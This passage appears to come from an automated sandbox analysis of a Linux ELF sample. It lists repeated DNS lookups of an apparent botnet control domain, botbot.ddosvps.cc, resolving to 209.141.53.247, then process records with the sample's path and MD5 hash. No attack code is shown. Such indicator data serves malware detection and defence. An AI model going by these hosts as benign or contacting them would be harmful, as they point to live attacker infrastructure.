                        Jul 2, 2024 18:13:40.588150978 CEST192.168.2.148.8.8.80x92f2Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:42.215075970 CEST192.168.2.148.8.8.80x9529Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:42.215372086 CEST192.168.2.148.8.8.80xc77cStandard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:43.828629971 CEST192.168.2.148.8.8.80x5e5cStandard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:43.831918955 CEST192.168.2.148.8.8.80xb576Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:45.472801924 CEST192.168.2.148.8.8.80x80dbStandard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:45.474287987 CEST192.168.2.148.8.8.80xd9a3Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:47.253124952 CEST192.168.2.148.8.8.80xcc44Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:47.254839897 CEST192.168.2.148.8.8.80x9105Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:48.874876976 CEST192.168.2.148.8.8.80xd087Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:48.875174046 CEST192.168.2.148.8.8.80x1af4Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:50.498800039 CEST192.168.2.148.8.8.80x3016Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:50.502166033 CEST192.168.2.148.8.8.80x4798Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:52.119829893 CEST192.168.2.148.8.8.80x390eStandard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:52.122286081 CEST192.168.2.148.8.8.80x96a2Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:53.729948044 CEST192.168.2.148.8.8.80x7c39Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:53.730173111 CEST192.168.2.148.8.8.80x83baStandard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:55.477740049 CEST192.168.2.148.8.8.80x8213Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:55.477972031 CEST192.168.2.148.8.8.80xafbeStandard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:57.110788107 CEST192.168.2.148.8.8.80x6bbbStandard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:57.110987902 CEST192.168.2.148.8.8.80x39c3Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:58.734031916 CEST192.168.2.148.8.8.80x857aStandard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:13:58.734297037 CEST192.168.2.148.8.8.80x77d5Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:00.357702017 CEST192.168.2.148.8.8.80xda3Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:00.360876083 CEST192.168.2.148.8.8.80x7a31Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:01.974080086 CEST192.168.2.148.8.8.80x3e09Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:01.974289894 CEST192.168.2.148.8.8.80xeb01Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:03.608968973 CEST192.168.2.148.8.8.80xd91cStandard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:03.609153986 CEST192.168.2.148.8.8.80xb422Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:05.230693102 CEST192.168.2.148.8.8.80x64a4Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:05.233939886 CEST192.168.2.148.8.8.80xac09Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:06.858468056 CEST192.168.2.148.8.8.80x6635Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:06.858683109 CEST192.168.2.148.8.8.80x36bbStandard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:08.489779949 CEST192.168.2.148.8.8.80xd283Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:08.489984989 CEST192.168.2.148.8.8.80xc048Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:10.104021072 CEST192.168.2.148.8.8.80xac73Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:10.104254961 CEST192.168.2.148.8.8.80xfb6bStandard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:11.733099937 CEST192.168.2.148.8.8.80x199aStandard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:11.733323097 CEST192.168.2.148.8.8.80xc1d6Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:13.340761900 CEST192.168.2.148.8.8.80x18bbStandard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:13.340980053 CEST192.168.2.148.8.8.80x4f76Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:14.950051069 CEST192.168.2.148.8.8.80x1861Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:14.950278044 CEST192.168.2.148.8.8.80x750aStandard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:16.590183973 CEST192.168.2.148.8.8.80x9d9eStandard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:16.591769934 CEST192.168.2.148.8.8.80x6d18Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:18.216202974 CEST192.168.2.148.8.8.80x2110Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:18.216485977 CEST192.168.2.148.8.8.80xad62Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:19.847203016 CEST192.168.2.148.8.8.80x473eStandard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:19.848803997 CEST192.168.2.148.8.8.80x8606Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:21.463753939 CEST192.168.2.148.8.8.80x569aStandard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:21.463831902 CEST192.168.2.148.8.8.80xe537Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:23.243113995 CEST192.168.2.148.8.8.80x54a5Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:23.243412971 CEST192.168.2.148.8.8.80x407dStandard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:24.859894037 CEST192.168.2.148.8.8.80x70e9Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:24.860177040 CEST192.168.2.148.8.8.80xcc96Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:26.478758097 CEST192.168.2.148.8.8.80x7f35Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:26.478929996 CEST192.168.2.148.8.8.80x8082Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:28.096065044 CEST192.168.2.148.8.8.80x1b2cStandard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:28.096239090 CEST192.168.2.148.8.8.80x43c7Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:29.717561960 CEST192.168.2.148.8.8.80x7bafStandard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:29.721471071 CEST192.168.2.148.8.8.80xd216Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:31.363512993 CEST192.168.2.148.8.8.80x1b03Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:31.364516020 CEST192.168.2.148.8.8.80x5a88Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:32.979027033 CEST192.168.2.148.8.8.80xc44fStandard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:32.979378939 CEST192.168.2.148.8.8.80x1391Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:35.368033886 CEST192.168.2.148.8.8.80x15bStandard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:35.372464895 CEST192.168.2.148.8.8.80x5778Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:36.981350899 CEST192.168.2.148.8.8.80x630fStandard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:36.982984066 CEST192.168.2.148.8.8.80x9ab2Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:38.591532946 CEST192.168.2.148.8.8.80xf5acStandard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:38.591691971 CEST192.168.2.148.8.8.80x4988Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:40.221297026 CEST192.168.2.148.8.8.80xa4d2Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:40.221543074 CEST192.168.2.148.8.8.80x72fcStandard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:41.823203087 CEST192.168.2.148.8.8.80x46c0Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:41.823328018 CEST192.168.2.148.8.8.80x7093Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:43.438344002 CEST192.168.2.148.8.8.80x40e8Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:43.440253019 CEST192.168.2.148.8.8.80x5dc2Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:45.067749977 CEST192.168.2.148.8.8.80x5822Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:45.069586992 CEST192.168.2.148.8.8.80x5ea0Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:46.684108019 CEST192.168.2.148.8.8.80x7d52Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:46.685575008 CEST192.168.2.148.8.8.80x224eStandard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:48.291810989 CEST192.168.2.148.8.8.80x9e64Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:48.291954994 CEST192.168.2.148.8.8.80x1830Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:49.921870947 CEST192.168.2.148.8.8.80xea73Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:49.922724009 CEST192.168.2.148.8.8.80x4e2aStandard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:51.532326937 CEST192.168.2.148.8.8.80x8535Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:51.532469034 CEST192.168.2.148.8.8.80x656dStandard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:53.172935009 CEST192.168.2.148.8.8.80x1f1eStandard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:53.173187017 CEST192.168.2.148.8.8.80x22dcStandard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:54.794234037 CEST192.168.2.148.8.8.80xbb78Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:54.794329882 CEST192.168.2.148.8.8.80xae7aStandard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:56.436242104 CEST192.168.2.148.8.8.80xb01Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:56.438051939 CEST192.168.2.148.8.8.80xb3deStandard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:58.044667959 CEST192.168.2.148.8.8.80x8a89Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:58.044775009 CEST192.168.2.148.8.8.80xc89eStandard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:14:59.668982029 CEST192.168.2.148.8.8.80x42d4Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:59.673352957 CEST192.168.2.148.8.8.80x6618Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:15:01.315491915 CEST192.168.2.148.8.8.80x8637Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:15:01.316277027 CEST192.168.2.148.8.8.80xa267Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:15:02.917653084 CEST192.168.2.148.8.8.80x9a76Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:15:02.917815924 CEST192.168.2.148.8.8.80x3008Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:15:04.526885986 CEST192.168.2.148.8.8.80x7414Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:15:04.529916048 CEST192.168.2.148.8.8.80x1965Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:15:06.334883928 CEST192.168.2.148.8.8.80xa4baStandard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:15:06.335557938 CEST192.168.2.148.8.8.80xdcdbStandard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:15:07.978025913 CEST192.168.2.148.8.8.80xc588Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:15:07.978202105 CEST192.168.2.148.8.8.80xe3d7Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:15:09.592943907 CEST192.168.2.148.8.8.80x65f8Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:15:09.595204115 CEST192.168.2.148.8.8.80xaecaStandard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:15:11.201966047 CEST192.168.2.148.8.8.80xc17aStandard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:15:11.203197956 CEST192.168.2.148.8.8.80x91b4Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        Jul 2, 2024 18:15:12.829972029 CEST192.168.2.148.8.8.80x3fd8Standard query (0)botbot.ddosvps.cc28IN (0x0001)false
                        Jul 2, 2024 18:15:12.830106974 CEST192.168.2.148.8.8.80x73b4Standard query (0)botbot.ddosvps.ccA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Jul 2, 2024 18:13:13.972325087 CEST8.8.8.8192.168.2.140x8b90No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:15.606826067 CEST8.8.8.8192.168.2.140xdbb3No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:17.243083000 CEST8.8.8.8192.168.2.140x7369No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:18.847155094 CEST8.8.8.8192.168.2.140xd7abNo error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:20.768111944 CEST8.8.8.8192.168.2.140xed48No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:22.397608042 CEST8.8.8.8192.168.2.140x7ad1No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:24.191035986 CEST8.8.8.8192.168.2.140x7987No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:25.797593117 CEST8.8.8.8192.168.2.140x3702No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:27.407010078 CEST8.8.8.8192.168.2.140xfc61No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:29.042182922 CEST8.8.8.8192.168.2.140xa206No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:30.644788027 CEST8.8.8.8192.168.2.140xafb1No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:32.291096926 CEST8.8.8.8192.168.2.140x73f3No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:33.893867016 CEST8.8.8.8192.168.2.140xef6No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:35.505729914 CEST8.8.8.8192.168.2.140x51abNo error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:37.134458065 CEST8.8.8.8192.168.2.140xcaf0No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:38.737591982 CEST8.8.8.8192.168.2.140xc9f6No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:40.612868071 CEST8.8.8.8192.168.2.140x92f2No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:42.221856117 CEST8.8.8.8192.168.2.140xc77cNo error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:43.839958906 CEST8.8.8.8192.168.2.140xb576No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:45.479717970 CEST8.8.8.8192.168.2.140x80dbNo error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:47.261749029 CEST8.8.8.8192.168.2.140x9105No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:48.881614923 CEST8.8.8.8192.168.2.140x1af4No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:50.505928993 CEST8.8.8.8192.168.2.140x3016No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:52.129133940 CEST8.8.8.8192.168.2.140x96a2No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:53.737016916 CEST8.8.8.8192.168.2.140x83baNo error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:55.484910965 CEST8.8.8.8192.168.2.140xafbeNo error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:57.117747068 CEST8.8.8.8192.168.2.140x39c3No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:13:58.741000891 CEST8.8.8.8192.168.2.140x77d5No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:00.364415884 CEST8.8.8.8192.168.2.140xda3No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:01.980998039 CEST8.8.8.8192.168.2.140xeb01No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:03.615884066 CEST8.8.8.8192.168.2.140xb422No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:05.239275932 CEST8.8.8.8192.168.2.140x64a4No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:06.865492105 CEST8.8.8.8192.168.2.140x36bbNo error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:08.497504950 CEST8.8.8.8192.168.2.140xc048No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:10.111176968 CEST8.8.8.8192.168.2.140xfb6bNo error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:11.740333080 CEST8.8.8.8192.168.2.140xc1d6No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:13.347879887 CEST8.8.8.8192.168.2.140x4f76No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:14.956865072 CEST8.8.8.8192.168.2.140x750aNo error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:16.597234964 CEST8.8.8.8192.168.2.140x9d9eNo error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:18.224234104 CEST8.8.8.8192.168.2.140xad62No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:19.853800058 CEST8.8.8.8192.168.2.140x473eNo error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:21.470643044 CEST8.8.8.8192.168.2.140x569aNo error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:23.249955893 CEST8.8.8.8192.168.2.140x54a5No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:24.867027998 CEST8.8.8.8192.168.2.140xcc96No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:26.486515045 CEST8.8.8.8192.168.2.140x8082No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:28.102900028 CEST8.8.8.8192.168.2.140x43c7No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:29.728904009 CEST8.8.8.8192.168.2.140x7bafNo error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:31.372519970 CEST8.8.8.8192.168.2.140x5a88No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:32.987096071 CEST8.8.8.8192.168.2.140xc44fNo error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:35.376889944 CEST8.8.8.8192.168.2.140x15bNo error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:36.991436958 CEST8.8.8.8192.168.2.140x9ab2No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:38.598002911 CEST8.8.8.8192.168.2.140xf5acNo error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:40.228498936 CEST8.8.8.8192.168.2.140x72fcNo error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:41.830179930 CEST8.8.8.8192.168.2.140x46c0No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:43.446855068 CEST8.8.8.8192.168.2.140x5dc2No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:45.074681997 CEST8.8.8.8192.168.2.140x5822No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:46.691786051 CEST8.8.8.8192.168.2.140x224eNo error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:48.298605919 CEST8.8.8.8192.168.2.140x1830No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:49.929575920 CEST8.8.8.8192.168.2.140x4e2aNo error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:51.542553902 CEST8.8.8.8192.168.2.140x656dNo error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:53.179951906 CEST8.8.8.8192.168.2.140x1f1eNo error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:54.804291010 CEST8.8.8.8192.168.2.140xbb78No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:56.444809914 CEST8.8.8.8192.168.2.140xb3deNo error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:58.052819014 CEST8.8.8.8192.168.2.140x8a89No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:14:59.675591946 CEST8.8.8.8192.168.2.140x42d4No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:15:01.322160006 CEST8.8.8.8192.168.2.140x8637No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:15:02.926660061 CEST8.8.8.8192.168.2.140x3008No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:15:04.533792019 CEST8.8.8.8192.168.2.140x7414No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:15:06.343741894 CEST8.8.8.8192.168.2.140xdcdbNo error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:15:07.984412909 CEST8.8.8.8192.168.2.140xe3d7No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:15:09.599952936 CEST8.8.8.8192.168.2.140x65f8No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:15:11.211251974 CEST8.8.8.8192.168.2.140x91b4No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false
                        Jul 2, 2024 18:15:12.836824894 CEST8.8.8.8192.168.2.140x73b4No error (0)botbot.ddosvps.cc209.141.53.247A (IP address)IN (0x0001)false

                        System Behavior

                        Start time (UTC):16:13:08
                        Start date (UTC):02/07/2024
                        Path:/tmp/ausNOyj9by.elf
                        Arguments:/tmp/ausNOyj9by.elf
                        File size:5181592 bytes
                        MD5 hash:ac46e9818cd936fbfcba5effd7f4e850

                        Start time (UTC):16:13:08
                        Start date (UTC):02/07/2024
                        Path:/tmp/ausNOyj9by.elf
                        Arguments:-
                        File size:5181592 bytes
                        MD5 hash:ac46e9818cd936fbfcba5effd7f4e850

                        Start time (UTC):16:13:08
                        Start date (UTC):02/07/2024
                        Path:/tmp/ausNOyj9by.elf
                        Arguments:/tmp/ausNOyj9by.elf
                        File size:5181592 bytes
                        MD5 hash:ac46e9818cd936fbfcba5effd7f4e850

                        Start time (UTC):16:13:08
                        Start date (UTC):02/07/2024
                        Path:/tmp/ausNOyj9by.elf
                        Arguments:-
                        File size:5181592 bytes
                        MD5 hash:ac46e9818cd936fbfcba5effd7f4e850

                        Start time (UTC):16:13:08
